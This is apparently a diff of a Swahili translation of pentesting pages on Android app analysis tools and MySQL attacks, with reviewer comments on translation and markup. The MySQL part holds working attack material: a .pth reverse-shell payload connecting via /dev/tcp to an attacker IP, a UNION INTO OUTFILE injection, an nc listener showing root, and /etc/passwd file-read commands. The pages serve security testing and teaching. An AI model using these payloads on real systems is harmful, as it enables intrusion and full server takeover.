- **Capture String Comparisons**: Inaweza kuwa muhimu sana. Itaonyesha **strings 2 zinazolinganishwa** na kama matokeo yalikuwa True au False.
- **Enumerate Class Methods**: Weka jina la class (kama "java.io.File") na itaonyesha methods zote za class hiyo.
- **Search Class Pattern**: Tafuta classes kwa pattern
- **Trace Class Methods**: **Trace** class nzima (ona inputs na outputs za methods zote za class). Kumbuka kwamba kwa default MobSF hufuatilia methods kadhaa zenye umuhimu za Android Api.
Mara utakapochagua module ya ziada unayotaka kutumia unahitaji kubonyeza "**Start Intrumentation**" na utaona matokeo yote katika "**Frida Live Logs**".
Mara tu unapochagua module ya ziada unayotaka kutumia unahitaji kubofya "**Start Intrumentation**" na utaona outputs zote katika "**Frida Live Logs**".
**Shell**
Mobsf pia inakuleta shell yenye baadhi ya amri za **adb**, **MobSF commands**, na amri za kawaida za **shell** kwenye sehemu ya chini ya ukurasa wa dynamic analysis. Baadhi ya amri za kuvutia:
Mobsf pia inakuleta shell yenye amri za **adb**, **MobSF commands**, na amri za kawaida za **shell** chini ya ukurasa wa dynamic analysis. Baadhi ya amri zinazovutia:
```bash
help
shell ls
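Review bot: the second copy of the "Frida scripts" paragraph reintroduces an English clause into a Swahili sentence and misspells the tool, `(to send the results of your Friday scripts to MobSF use the function `send()`)`; the first copy, `kama utatumia function `send()` kutuma matokeo ya Frida scripts zako kwa MobSF`, is the one to keep. Both copies of the closing sentence also carry the upstream typo "**Start Intrumentation**" (spelled "Instrumentation" correctly earlier in the same paragraph), and the line that now reads only `.png>)` is the tail of an image link whose opening `![](<` was lost, so that screenshot will not render after this commit.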
@ -649,24 +650,24 @@ exported_activities
services
receivers
```
**Zana za HTTP**
**HTTP tools**
Wakati traffic ya http inapokamatwa unaweza kuona mtazamo mbaya wa traffic iliyokamatwa kwenye kitufe cha "**HTTP(S) Traffic**" au mtazamo mzuri kwenye kitufe cha kijani "**Start HTTPTools**". Kutoka chaguo la pili, unaweza **kutuma** **maombi yaliyokamatwa** kwa **proxies** kama Burp au Owasp ZAP.\
Ili kufanya hivyo, _washa Burp -->_ _zima Intercept --> katika MobSB HTTPTools chagua request_ --> bonyeza "**Send to Fuzzer**" --> _chagua anwani ya proxy_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)).
Wakati trafiki ya HTTP inapokamatwa unaweza kuona muonekano mbaya wa trafiki iliyokamatwa kwenye kitufe "**HTTP(S) Traffic**" au muonekano mzuri kwenye kitufe kijani "**Start HTTPTools**". Kutoka chaguo la pili, unaweza **send** the **captured requests** to **proxies** kama Burp au Owasp ZAP.\
Ili kufanya hivyo, _power on Burp -->_ _turn off Intercept --> in MobSB HTTPTools select the request_ --> bonyeza "**Send to Fuzzer**" --> _select the proxy address_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)).
Mara tu umemaliza dynamic analysis na MobSF unaweza kubonyeza "**Start Web API Fuzzer**" ili **fuzz http requests** na kutafuta udhaifu.
Mara baada ya kumaliza the dynamic analysis na MobSF unaweza kubonyeza "**Start Web API Fuzzer**" ili **fuzz http requests** na kutafuta udhaifu.
> [!TIP]
> Baada ya kufanya dynamic analysis na MobSF mipangilio ya proxy inaweza kuwa imepangwa vibaya na huwezi kuirekebisha kutoka GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya:
> Baada ya kufanya the dynamic analysis na MobSF mipangilio ya proxy inaweza kuwa imepangwa vibaya na huwezi kuirekebisha kutoka GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya:
>
> ```
> adb shell settings put global http_proxy :0
> ```
### Assisted Dynamic Analysis with Inspeckage
### Uchambuzi wa Dynamic uliosaidiwa na Inspeckage
Unaweza kupata zana kutoka [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\
Zana hii itatumia baadhi ya **Hooks** kukufahamisha **nini kinaendelea ndani ya application** wakati unafanya **dynamic analysis**.
Zana hii itatumia baadhi ya **Hooks** kukujulisha **kinachotokea katika application** wakati unafanya a **dynamic analysis**.
### [Yaazhini](https://www.vegabird.com/yaazhini/)
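Review bot: the re-translated HTTP tools paragraph is only half translated: `unaweza **send** the **captured requests** to **proxies** kama Burp` and `_power on Burp -->_ _turn off Intercept --> in MobSB HTTPTools select the request_` mix English fragments into Swahili sentences, while the first copy of the same two lines was fully Swahili; keep the fully translated copy. Both copies keep the upstream typo "MobSB" (MobSF). While here, the proxy link `[http://127.0.0.1:8080\\](http://127.0.0.1:8080)` has a stray escaped backslash in its link text that shows up in the rendered page.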
@ -676,7 +677,7 @@ Hii ni **zana nzuri ya kufanya static analysis kwa GUI**
### [Qark](https://github.com/linkedin/qark)
Zana hii imeundwa kutafuta maeneo mbalimbali ya **security related Android application vulnerabilities**, iwe katika **source code** au **packaged APKs**. Zana pia ina uwezo wa **kuunda a "Proof-of-Concept" deployable APK** na **ADB commands**, ili kutekeleza baadhi ya vulnerabilities zilizopatikana (Exposed activities, intents, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa cha mtihani.
Zana hii imeundwa kutafuta udhaifu mbalimbali zinazohusiana na usalama za Android application, iwe katika **source code** au **packaged APKs**. Zana pia ina uwezo wa kuunda "Proof-of-Concept" deployable APK na **ADB commands**, ili kutumia baadhi ya udhaifu uliopatikana (Exposed activities, intents, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa cha mtihani.
```bash
pip3 install --user qark  # --user is only needed if not using a virtualenv
qark --apk path/to/my.apk
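Review bot: the second copy of the Qark sentence drops the bold on `security related Android application vulnerabilities` and on `"Proof-of-Concept" deployable APK` that the first copy keeps, so the emphasis no longer matches the neighbouring tool descriptions; restore the `**...**` markers in the translated sentence.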
@ -685,20 +686,20 @@ qark --java path/to/specific/java/file.java
```
### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git)
- Inaonyesha faili zote zilizochimbuliwa kwa rejea rahisi
- Inafanya decompile moja kwa moja ya APK files hadi Java na Smali format
- Huchambua AndroidManifest.xml kwa vulnerabilities za kawaida na tabia
- Static source code analysis kwa vulnerabilities za kawaida na tabia
- Inaonyesha faili zote zilizotolewa kwa marejeo rahisi
- Hu-decompile faili za APK moja kwa moja hadi muundo wa Java na Smali
- Huchambua AndroidManifest.xml kwa ajili ya udhaifu na tabia za kawaida
- Uchambuzi wa static wa source code kwa ajili ya udhaifu na tabia za kawaida
- Taarifa za kifaa
- na mengine mengi
- na zaidi
```bash
reverse-apk relative/path/to/APP.apk
```
### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super)
SUPER ni programu ya mstari wa amri inayoweza kutumika kwenye Windows, MacOS X na Linux, ambayo inachambua faili za _.apk_ kwa kutafuta udhaifu. Inafanya hivyo kwa kufungua APKs na kutumia mfululizo wa sheria kugundua udhaifu hizo.
SUPER ni programu ya command-line inayoweza kutumika kwenye Windows, MacOS X na Linux, inayochambua faili za _.apk_ kwa kutafuta vulnerabilities. Inafanya hivyo kwa kuzifungua APKs na kutumia mfululizo wa sheria kugundua vulnerabilities hizo.
Sheria zote ziko kwenye faili la `rules.json`, na kila kampuni au mtapimaji anaweza kuunda sheria zake ili kuchambua wanachohitaji.
Sheria zote ziko katika faili ya `rules.json`, na kila kampuni au mtapimaji anaweza kuunda sheria zake za kuchambua wanazohitaji.
Pakua binaries za hivi karibuni kutoka kwenye [download page](https://superanalyzer.rocks/download.html)
```
@ -708,9 +709,9 @@ super-analyzer {apk_file}
.png>)
StaCoAn ni zana ya **crossplatform** inayowasaidia waendelezaji, bugbounty hunters na ethical hackers wanaofanya [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) kwenye programu za rununu.
StaCoAn ni zana ya **crossplatform** inayowawezesha waendelezaji, bugbounty hunters na ethical hackers kufanya [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) kwenye programu za rununu.
Dhana ni kwamba unaburuta na kuachia (drag and drop) faili ya programu yako ya rununu (faili ya .apk au .ipa) kwenye programu ya StaCoAn na itatengeneza ripoti ya kuona na inayobebeka kwa ajili yako. Unaweza kurekebisha settings na wordlists kupata uzoefu uliobinafsishwa.
Dhana ni kwamba unaburuta na kuachia faili ya programu yako ya rununu (faili .apk au .ipa) kwenye application ya StaCoAn na itatengeneza ripoti ya kuona na inayoweza kubebwa kwako. Unaweza kubadilisha mipangilio na wordlists ili kupata uzoefu uliyobinafsishwa.
Pakua[ latest release](https://github.com/vincentcox/StaCoAn/releases):
```
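Review bot: `Pakua[ latest release](https://github.com/vincentcox/StaCoAn/releases):` has the space inside the link text instead of before the bracket; it should read `Pakua [latest release](...)`. It is unchanged context, but the hunk rewrites the two sentences directly above it, so fix it in the same pass. The lone `.png>)` at the top of the hunk is again the tail of a broken image link.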
@ -718,7 +719,7 @@ Pakua[ latest release](https://github.com/vincentcox/StaCoAn/releases):
```
### [AndroBugs](https://github.com/AndroBugs/AndroBugs_Framework)
AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android unaosaidia waendelezaji au hackers kutafuta udhaifu za usalama zinazowezekana katika programu za Android.\
AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android unaosaidia waendelezaji au hackers kugundua udhaifu za usalama zinazowezekana katika programu za Android.\
[Windows releases](https://github.com/AndroBugs/AndroBugs_Framework/releases)
```
python androbugs.py -f [APK file]
@ -726,11 +727,11 @@ androbugs.exe -f [APK file]
```
### [Androwarn](https://github.com/maaaaz/androwarn)
**Androwarn** ni zana yenye lengo kuu la kugundua na kuwaonya watumiaji kuhusu tabia hatari zinazoweza kutendeka katika programu ya Android.
**Androwarn** ni zana ambayo lengo lake kuu ni kugundua na kuwaonya mtumiaji kuhusu tabia hatari zinazoweza kufanywa na Android application.
Ugunduzi unafanywa kwa kutumia **static analysis** ya Dalvik bytecode ya programu, iliyoonyeshwa kama **Smali**, kwa kutumia maktaba ya [`androguard`](https://github.com/androguard/androguard).
Ugundaji hufanywa kwa **static analysis** ya application's Dalvik bytecode, inayowakilishwa kama **Smali**, kwa kutumia maktaba [`androguard`](https://github.com/androguard/androguard).
Zana hii inatafuta **tabia za kawaida za programu "mbaya"** kama: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution...
Zana hii inatafuta **common behavior of "bad" applications** like: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution...
```
python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
```
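Review bot: the re-translated line `Zana hii inatafuta **common behavior of "bad" applications** like: ...` leaves the bolded clause and `like:` in English inside a Swahili sentence, whereas the first copy, `**tabia za kawaida za programu "mbaya"** kama:`, was fully translated; keep the translated clause. The behaviour names that follow (Telephony identifiers exfiltration, Audio/video flow interception, ...) are Androwarn's own category names and are fine left in English.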
@ -738,72 +739,72 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
.png>)
**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. Ni zana inayoweka pamoja zana zinazotumika sana za reverse engineering na analysis za mobile application, kusaidia katika kujaribu programu za rununu dhidi ya tishio za usalama za OWASP. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa waendelezaji wa programu za rununu na wataalamu wa usalama.
**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. Ni chombo kinachoongeza pamoja zana zinazotumika mara kwa mara za mobile application reverse engineering na analysis, kusaidia katika kujaribu mobile applications dhidi ya vitisho vya OWASP mobile security. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa watengenezaji wa mobile application na wataalamu wa usalama.
Ina uwezo wa:
- Extract Java and Smali code using different tools
- Analyze APKs using: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD)
- Toka private information kutoka APK kwa kutumia regexps.
- Chambua Manifest.
- Chambua domains zilizopatikana kwa kutumia: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) and [whatweb](https://github.com/urbanadventurer/WhatWeb)
- Deobfuscate APK via [apk-deguard.com](http://www.apk-deguard.com)
- Kutoa msimbo wa Java na Smali kwa kutumia zana mbalimbali
- Kuchambua APKs using: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD)
- Kutoa taarifa za kibinafsi kutoka kwenye APK kwa kutumia regexps.
- Kuchambua Manifest.
- Kuchambua domain zilizopatikana using: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) and [whatweb](https://github.com/urbanadventurer/WhatWeb)
- Kuondoa obfuscation ya APK kupitia [apk-deguard.com]
### Koodous
Useful to detect malware: [https://koodous.com/](https://koodous.com)
Inafaa kugundua malware: [https://koodous.com/](https://koodous.com/)
## Obfuscating/Deobfuscating code
## Kuficha/Kuondoa kuficha msimbo
Kumbuka kwamba, kutegemea huduma na usanidi utakao tumia kuficha msimbo, secrets zinaweza kuwa zimefichwa au zisifichwe.
Kumbuka kwamba, kulingana na huduma na usanidi unayotumia kuficha msimbo, siri zinaweza kufichwa au zisifichwe.
### [ProGuard](<https://en.wikipedia.org/wiki/ProGuard_(software)>)
From [Wikipedia](<https://en.wikipedia.org/wiki/ProGuard_(software)>): **ProGuard** is an open source command-line tool that shrinks, optimizes and obfuscates Java code. Inaweza kuboresha bytecode pamoja na kugundua na kuondoa maagizo yasiyotumika. ProGuard ni programu ya bure na inasambazwa chini ya GNU General Public License, version 2.
From [Wikipedia](<https://en.wikipedia.org/wiki/ProGuard_(software)>): **ProGuard** ni zana ya open source ya command-line inayopunguza, kuboresha na kuficha Java code. Ina uwezo wa kuboresha bytecode pamoja na kugundua na kuondoa maagizo yasiyotumika. ProGuard ni programu huria na inasambazwa chini ya GNU General Public License, version 2.
ProGuard inasambazwa kama sehemu ya Android SDK na inaendesha wakati wa kujenga application katika release mode.
ProGuard inatolewa kama sehemu ya Android SDK na inafanya kazi wakati wa kujenga application katika release mode.
### [DexGuard](https://www.guardsquare.com/dexguard)
Pata mwongozo hatua kwa hatua wa ku-deobfuscate apk katika [https://blog.lexfo.fr/dexguard.html](https://blog.lexfo.fr/dexguard.html)
(From that guide) Last time we checked, the Dexguard mode of operation was:
(From that guide) Mara ya mwisho tulipoangalia, mode ya uendeshaji wa Dexguard ilikuwa:
- pakia resource kama InputStream;
- pitisha matokeo kwa class inayoirithi kutoka FilterInputStream ili ku-decrypt;
- fanya obfuscation isiyo na maana ili kumwudhiwa reverser kwa muda;
- pitisha result iliyodecrypted kwa ZipInputStream ili kupata faili la DEX;
- hatimaye pokea DEX iliyopatikana kama Resource kwa kutumia method ya `loadDex`.
- load a resource as an InputStream;
- feed the result to a class inheriting from FilterInputStream to decrypt it;
- do some useless obfuscation to waste a few minutes of time from a reverser;
- feed the decrypted result to a ZipInputStream to get a DEX file;
- finally load the resulting DEX as a Resource using the `loadDex` method.
### [DeGuard](http://apk-deguard.com)
**DeGuard reverses the process of obfuscation performed by Android obfuscation tools. This enables numerous security analyses, including code inspection and predicting libraries.**
Unaweza kupakia APK iliyofichwa kwenye jukwaa lao.
Unaweza kupakia APK iliyofichwa kwenda kwenye platform yao.
### [Deobfuscate android App]https://github.com/In3tinct/deobfuscate-android-app
Hii ni zana ya LLM ya kutafuta potential security vulnerabilities katika android apps na ku-deobfuscate code ya android app. Inatumia Google's Gemini public API.
Hii ni zana ya LLM ya kutafuta udhaifu wowote wa usalama katika android apps na ku-deobfuscate android app code. Inatumia Google's Gemini public API.
### [Simplify](https://github.com/CalebFenton/simplify)
Ni **generic android deobfuscator.** Simplify **virtually executes an app** ili kuelewa tabia yake kisha **hujaribu kuboresha msimbo** ili ufanye kazi sawasawa lakini uwe rahisi kwa mwanadamu kuufahamu. Kila aina ya optimization ni rahisi na generic, kwa hivyo haijalishi ni aina gani ya obfuscation ilitumika.
Ni generic android deobfuscator. Simplify virtually executes an app ili kuelewa mienendo yake kisha inajaribu optimize the code ili iitende sawa lakini iwe rahisi kwa binadamu kuelewa. Kila aina ya optimization ni rahisi na generic, hivyo haijalishi aina maalum ya obfuscation inayotumiwa.
### [APKiD](https://github.com/rednaga/APKiD)
APKiD inakupa taarifa kuhusu **jinsi APK ilivyotengenezwa**. Inatambua compilers nyingi, packers, obfuscators, na mambo mengine ya ajabu. Ni [_PEiD_](https://www.aldeid.com/wiki/PEiD) kwa Android.
APKiD inakupa taarifa kuhusu **how an APK was made**. Inatambua many **compilers**, **packers**, **obfuscators**, na mambo mengine ya ajabu. Ni [_PEiD_](https://www.aldeid.com/wiki/PEiD) kwa Android.
### Manual
[Read this tutorial to learn some tricks on **how to reverse custom obfuscation**](manual-deobfuscation.md)
## Labs
## Maabara
### [Androl4b](https://github.com/sh4hin/Androl4b)
AndroL4b ni mashine halisi ya usalama ya Android inayotegemea ubuntu-mate inayojumuisha mkusanyiko wa frameworks za hivi punde, tutorials na maabara kutoka kwa wanageek wa usalama na watafiti kwa ajili ya reverse engineering na malware analysis.
AndroL4b ni Android security virtual machine inayotokana na ubuntu-mate inayojumuisha mkusanyiko wa latest framework, tutorials na labs kutoka kwa security geeks na researchers mbalimbali kwa reverse engineering na malware analysis.
## References
## Marejeo
- [https://owasp.org/www-project-mobile-app-security/](https://owasp.org/www-project-mobile-app-security/)
- [https://appsecwiki.com/#/](https://appsecwiki.com/#/) Ni orodha nzuri ya rasilimali
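Review bot: two regressions in this hunk. First, the MARA bullet `Kuondoa obfuscation ya APK kupitia [apk-deguard.com]` drops the link target that the other copy has, `[apk-deguard.com](http://www.apk-deguard.com)`, leaving a bracketed label that renders as plain text; restore the `(http://www.apk-deguard.com)` part. Second, the DexGuard mode-of-operation list appears once in Swahili (`pakia resource kama InputStream; ...`) and once in English (`load a resource as an InputStream; ...`); if the English copy is the added side, as the ordering of the other paired lines in this diff suggests, the list is being un-translated while the sentence right above it (`Mara ya mwisho tulipoangalia ...`) is newly translated, so keep the Swahili bullets. Smaller points: the heading `### [Deobfuscate android App]https://github.com/In3tinct/deobfuscate-android-app` is missing the parentheses around its URL and renders as a broken link; the second copies of the Simplify and APKiD paragraphs mix English into Swahili (`Simplify virtually executes an app ili kuelewa ...`, `taarifa kuhusu **how an APK was made**`) and drop the bold that the first copies had; and the Koodous change from `https://koodous.com` to `https://koodous.com/` is harmless.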
@ -815,7 +816,7 @@ AndroL4b ni mashine halisi ya usalama ya Android inayotegemea ubuntu-mate inayoj
- [SSLPinDetect GitHub](https://github.com/aancw/SSLPinDetect)
- [smali-sslpin-patterns](https://github.com/aancw/smali-sslpin-patterns)
## Yet to try
## Bado kujaribu
- [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
- [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
@ -4,15 +4,15 @@
## **Maelezo ya Msingi**
**MySQL** inaweza kuelezewa kama mfumo wa usimamizi wa hifadhidata za mahusiano (Relational Database Management System - RDBMS) wa chanzo wazi unaopatikana bila gharama. Inatumia **Structured Query Language (SQL)**, ikiruhusu usimamizi na urekebishaji wa hifadhidata.
**MySQL** inaweza kuelezewa kama mfumo wa chanzo wazi wa **Relational Database Management System (RDBMS)** unaopatikana bila malipo. Inatumia **Structured Query Language (SQL)**, ikiruhusu usimamizi na uendeshaji wa hifadhidata.
**Bandari ya chaguo-msingi:** 3306
```
3306/tcp open  mysql
```
## **Unganisha**
## **Kuunganisha**
### **Lokali**
### **Ndani**
```bash
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
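Review bot: `mysql -u root -p # A password will be asked (check someone)` is unclear; the parenthetical presumably means to try a password you have already found (default or reused credentials). It is unchanged context, but the hunk retitles the heading directly above it, so reword the comment in the same change.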
@ -24,7 +24,7 @@ mysql -h <Hostname> -u root@localhost
```
## External Enumeration
Baadhi ya vitendo za enumeration zinahitaji credentials halali
Baadhi ya vitendo vya enumeration vinahitaji credentials halali
```bash
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
@ -36,7 +36,7 @@ msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
```
### [**Brute force**](../generic-hacking/brute-force.md#mysql)
### Andika data yoyote ya binari
### Andika data yoyote ya binary
```bash
CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
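Review bot: the example `CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)` passes 37 hex digits to `UNHEX()`; MySQL treats an odd-length argument by taking the first digit as a lone nibble (as if a leading `0` were prepended), so the bytes written are not what a reader who pastes their own hex expects. Use an even number of digits so the example round-trips. Context line, but the heading this hunk touches sits directly above it.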
@ -78,7 +78,7 @@ quit;
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'
```
### Uorodheshaji wa Ruhusa za MySQL
### Kuorodhesha Ruhusa za MySQL
```sql
#Mysql
SHOW GRANTS [FOR user];
@ -101,7 +101,7 @@ SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCT
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
```
Unaweza kuona katika nyaraka maana ya kila ruhusa: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_execute)
Unaweza kuona katika nyaraka maana ya kila privilege: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_execute)
### MySQL File RCE
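Review bot: in both copies of the privileges sentence the visible link text is `https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html` while the target is `...privileges-provided.html#priv_execute`, so the reader lands on the EXECUTE entry rather than the top of the privilege table the sentence refers to; either drop the `#priv_execute` fragment or say that it points at one privilege.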
@ -110,44 +110,47 @@ Unaweza kuona katika nyaraka maana ya kila ruhusa: [https://dev.mysql.com/doc/re
../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
{{#endref}}
#### INTO OUTFILE → Python `.pth` RCE (mabano ya usanidi maalum kwa tovuti)
#### INTO OUTFILE → Python `.pth` RCE (hook za usanidi maalum za tovuti)
Kwa kutumia vibaya primitive ya jadi `INTO OUTFILE` inawezekana kupata *arbitrary code execution* kwenye vichwa vinavyotekelezwa baadaye na scripts za **Python**.
Kwa kutumia mbinu ya kawaida ya `INTO OUTFILE` inawezekana kupata *arbitrary code execution* kwenye malengo ambayo baadaye yanaendesha **Python** scripts.
1. Tumia `INTO OUTFILE` kuweka faili maalum **`.pth`** ndani ya direktori yoyote inayopakuliwa kiotomatiki na `site.py` (mfano `.../lib/python3.10/site-packages/`).
2. Faili ya `.pth` inaweza kuwa na *mstari mmoja* unaoanza na `import ` ukifuatiwa na arbitrary Python code ambao utaendeshwa kila wakati mtafsiri anapoanza.
3. Wakati mtafsiri anapoendeshwa kwa njia isiyo ya moja kwa moja na CGI script (kwa mfano `/cgi-bin/ml-draw.py` yenye shebang `#!/bin/python`) payload inatekelezwa kwa ruhusa sawa na mchakato wa web-server (FortiWeb uliuendesha kama **root** → full pre-auth RCE).
1. Tumia `INTO OUTFILE` kuandika faili maalum **`.pth`** ndani ya direktori yoyote inayopakiwa kiotomatiki na `site.py` (kwa mfano `.../lib/python3.10/site-packages/`).
2. Faili `.pth` inaweza kuwa na *mstari mmoja* unaoanza na `import ` ukifuatiwa na arbitrary Python code ambayo itaendeshwa kila wakati interpreter inapoanza.
3. Wakati interpreter inapoendeshwa kwa njia isiyoonekana na CGI script (kwa mfano `/cgi-bin/ml-draw.py` yenye shebang `#!/bin/python`) payload itatekelezwa kwa vibali sawa na mchakato wa web-server (FortiWeb iliiendesha kama **root** → full pre-auth RCE).
Example `.pth` payload (single line, no spaces can be included in the final SQL payload, so hex/`UNHEX()` or string concatenation may be required):
```python
import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)
```
Mfano wa kutengeneza faili kupitia query ya **UNION** (nafasi zilibadilishwa na `/**/` ili kuepuka kichujio cha nafasi cha `sscanf("%128s")` na kudumisha urefu wa jumla ≤128 bytes):
Mfano wa kutengeneza faili kupitia ombi la **UNION** (alama za nafasi zilibadilishwa na `/**/` ili kupita kichujio cha nafasi cha `sscanf("%128s")` na kudumisha jumla ya urefu ≤128 bytes):
```sql
'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'
```
Mapungufu muhimu na njia za kuyapita:
Vizuizi muhimu & njia za kuepuka:
* `INTO OUTFILE` **haiwezi kuandika tena** mafaili yaliyopo; chagua jina jipya la faili.
* Njia ya faili inatatuliwa **kuhusiana na CWD ya MySQL**, hivyo kuwekeza kwa `../../` mwanzoni kunasaidia kufupisha njia na kupita vikwazo vya njia kamili.
* Ikiwa ingizo la mshambuliaji linachukuliwa kwa `%128s` (au kama hiyo) nafasi yoyote itakata payload; tumia mfululizo wa maoni wa MySQL `/**/` au `/*!*/` kubadilisha nafasi.
* Mtumiaji wa MySQL anayeendesha query anahitaji idhini ya `FILE`, lakini katika vifaa vingi (m.f. FortiWeb) huduma inaendesha kama **root**, ikitoa ufikiaji wa kuandika karibu kila mahali.
* `INTO OUTFILE` **haiwezi kuandika juu ya** faili zilizopo; chagua jina jipya la faili.
* Njia ya faili inatatuliwa **relative to MySQL’s CWD**, kwa hivyo kuweka `../../` mwanzoni husaidia kufupisha njia na kuepuka vikwazo vya absolute-path.
* Ikiwa input ya mshambulizi imetolewa kwa `%128s` (au sawa) nafasi yoyote itakata payload; tumia mfululizo wa comment za MySQL `/**/` au `/*!*/` kubadilisha nafasi.
* Mtumiaji wa MySQL anayetekeleza query anahitaji ruhusa ya `FILE`, lakini katika appliances nyingi (mfano FortiWeb) service inaendeshwa kama **root**, ikitoa ufikiaji wa kuandika karibu kila mahali.
Baada ya kuangusha `.pth`, omba tu CGI yoyote inayoshughulikiwa na python interpreter ili kupata code execution:
Baada ya kuangusha `.pth`, omba tu CGI yoyote inayosimamiwa na interpreter ya python ili kupata code execution:
```
GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>
```
Mchakato wa Python uta-import `.pth` yenye madhara kiotomatiki na utekeleze shell payload.
Mchakato wa Python uta-import `.pth` yenye madhara kiotomatiki na uta-execute shell payload.
```
# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)
```
---
## MySQL arbitrary read file by client
Kwa kweli, unapojaribu **load data local into a table** ili kupata **content of a file**, MySQL au MariaDB server humuuliza **client to read it** na kutuma maudhui. **Kisha, ikiwa unaweza kubadilisha mysql client ili kuungana na MySQL server yako mwenyewe, unaweza kusoma arbitrary files.**\ Tafadhali kumbuka kwamba hili ndilo tabia linapotumika kutumia:
Kwa kweli, unapojaribu **load data local into a table** server ya MySQL au MariaDB inaomba **client to read it** na kutuma **content of a file**. **Then, if you can tamper a mysql client to connect to your own MySQL server, you can read arbitrary files.**\
Tafadhali kumbuka kwamba hili ndilo tabia linapotumika:
```bash
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
```
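Review bot: the `.pth` write-up has a gap between its two code blocks: the UNION example writes `token` values from `fabric_user.user_table` with `INTO OUTFILE`, but the text never says how the `import os,sys,subprocess,...` line gets into that column, so as written the file dropped at `site-packages/x.pth` contains tokens, not the payload. Either state that the payload must first be stored in the selected column, or show the `SELECT` with the payload as a literal (hex via `UNHEX()`, as the sentence above the payload already hints) so the two examples connect. Two caveats the limitations list omits and a reader will hit: `INTO OUTFILE` also fails outright when `secure_file_priv` is set to a directory or to an empty value (the `ERROR 1290 ... --secure-file-priv` line further down this file shows exactly that), and the relative path is resolved from the server process's working directory, which for mysqld is its data directory, so that is what the "CWD" wording means in practice. Minor: the note "no spaces can be included in the final SQL payload" is immediately followed by a payload full of spaces, which only works once it is hex-encoded; say so next to the payload rather than leaving the reader to reconcile the two.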
@ -158,33 +161,31 @@ mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
```
**PoC ya Awali:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\
**Kwenye karatasi hii unaweza kuona maelezo kamili ya shambulio na hata jinsi ya kuiendeleza hadi RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\
**PoC ya awali:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\
**Kwenye karatasi hii unaweza kuona maelezo kamili ya shambulio na hata jinsi ya kulipanua hadi RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\
**Hapa unaweza kupata muhtasari wa shambulio:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)
## POST
### Mtumiaji wa Mysql
### Mysql User
Itakuwa ya kuvutia sana ikiwa mysql inaendeshwa kama **root**:
Itakuwa ya kuvutia sana ikiwa mysql inaendesha kama **root**:
```bash
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
